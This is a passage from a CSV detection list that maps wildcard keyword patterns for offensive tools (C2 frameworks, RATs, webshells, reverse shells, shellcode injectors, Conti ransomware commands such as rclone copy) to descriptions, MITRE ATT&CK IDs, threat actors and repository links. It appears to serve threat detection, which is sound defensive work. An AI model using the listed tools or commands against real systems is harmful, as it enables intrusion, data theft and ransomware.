Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1022","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" +"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpUpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpUpMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpView.exe*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*SharpView\SharpView*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*SharpView-master*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWebManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWMI.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpWmiManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*sharpwmi-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*sharpwsus locate*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharpWSUS.*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505 - T1027 - T1059 - T1117","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*sharpyshell.aspx*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*SharPyShell.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*SharpZeroLogon*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpZippo.exe*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" +"*ShawnDEvans/smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shell net group *Domain Computers* /domain*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell net localgroup administrators*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell nltest /dclist*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell rclone.exe copy *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell should now be running as nt authority\\system!*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*shell whoami /user*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*shell whoami*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell.exe -s payload.txt*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*Shell3er.ps1*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*shellc *.bin *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*shellc *.shellc *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd sc qc *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SHELLCODE GENERATOR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Shellcode Injected Successfully*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*shellcode.asm*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation 